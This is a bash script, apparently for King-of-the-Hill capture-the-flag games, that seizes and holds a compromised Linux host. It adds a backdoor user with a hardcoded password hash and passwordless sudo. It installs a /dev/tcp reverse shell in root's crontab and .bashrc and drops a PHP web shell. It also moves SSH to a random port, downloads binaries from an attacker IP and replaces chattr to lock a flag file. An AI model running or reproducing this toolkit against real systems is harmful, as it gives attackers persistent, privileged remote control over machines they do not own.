#!/bin/bash


## made by #blvckmetxl

# --> READ: you should change the password in the beginning of the `persist` function, default is 'hahaha1234hahaha'

nickname=
ip=
port=
revsh="/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'"
ssh="/etc/ssh/sshd_config"

function nyan() {
  # https://github.com/klange/nyancat  
  wget http://$ip/nyancat
  chmod +x nyancat
  mv -f nyancat /usr/bin/nyancat
}

function persist() {
  # adding user with your nickname
  useradd -m $nickname -s /bin/bash
  sudo sed -i "s/$nickname:x:/$nickname:qpQzOFb2UGjtE:/g" /etc/passwd #< -- change password hash here
  echo "$nickname ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

  # backdoors ;D
  echo "* * * * * root $revsh" >> /etc/crontab
  echo $revsh >> /root/.bashrc
  echo; echo; echo "<?php system(\$_GET['cmd']); ?>" >> $RANDOM.php; echo "[+] `ls -Art | tail -n 1` IS YOUR PHP BACKDOOR!"; echo; echo
}

function ssh() {
  # changes ssh port to random number generated by $RANDOM
  
  sed -i 's/Port/#Port/g' $ssh
  echo "Port $RANDOM" >> $ssh

  echo; echo; echo "[+] NEW PORT IS `tail -n 1 $ssh | cut -d' ' -f2`!"; echo; echo
  systemctl restart sshd.service
}

function koth() {
  # repeatedly puts your name in king.txt
  
  rm chattr 2>/dev/null; rm -f $(which chattr) 2>/dev/null
  wget http://$ip/chattr && chmod 744 chattr
  
  while :
  do
    ./chattr -ai /root/king.txt
    echo "$nickname" > /root/king.txt
    ./chattr +ai /root/king.txt
  done
}

if [ "$#" -gt 0 ]
then
  case "$1" in
        a) persist; sleep 2
           ssh; sleep 2
           nyan
           koth;;
        -a)persist; sleep 2
           ssh; sleep 2
           nyan
           koth;;

        p) persist;;
        -p)persist;;

        n) nyan;;
        -n)nyan;;

        s) ssh;;
        -s)ssh;;
  esac
else
  # if no arguments given just execute koth function
  koth
fi
